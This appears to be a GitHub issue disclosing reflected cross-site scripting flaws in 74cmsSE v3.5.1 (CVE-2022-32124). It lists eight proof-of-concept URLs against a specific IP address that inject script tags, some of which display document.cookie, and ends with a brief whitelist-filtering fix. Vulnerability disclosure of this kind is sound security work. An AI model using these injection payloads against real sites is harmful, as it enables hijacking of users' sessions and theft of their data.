Headline
CVE-2022-32124: There are multiple reflective XSS vulnerabilities in this cms · Issue #3 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading
74cmsSE v3.5.1 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /index/jobfairol/show/.
Vulnerability name:Reflective XSS
Date of Discovery: 30/5/2022
Affected version: 74cmsSE_v3.5.1
Download link: http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.
Vulnerability location:Many places,Here are some places I found:
Verification process:
1、exp: http://124.223.95.129:8766/index/jobfairol/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS
2、exp:http://124.223.95.129:8766/job/?"<ScRiPt>alert(“xss”);<%2FScRiPt>"=11
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS
3、exp:http://124.223.95.129:8766/company/?"<ScRiPt>alert(1)<%2FScRiPt>"=11
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS
4、exp:http://124.223.95.129:8766/company/view_be_browsed/total/d1/_d1_/?"<ScRiPt>alert(11)<%2FScRiPt>"=2
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS
5、exp:http://124.223.95.129:8766/company/service/increment/add/im/d1/_d1_/d2/_d2_.html?"<ScRiPt>alert(123)<%2FScRiPt>"=world
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS
6、exp: http://124.223.95.129:8766/company/account/safety/trade/?"<ScRiPt>alert(555)<%2FScRiPt>"=key
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS
7、exp: http://124.223.95.129:8766/index/notice/show/<%2Ftitle>1<ScRiPt>alert(document.cookie)<%2FScRiPt>
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS
8、exp: http://124.223.95.129:8766/company/down_resume/total/nature/?"<ScRiPt>alert(11)<%2FScRiPt>"=page
With the following Picture we can see that the inserted js code has been executed, and prove the existence of a reflective XSS
Repair method:
Filter the data according to the tags and attributes of the whitelist to clear the executable script (such as script tag, oneror attribute of img tag, etc.)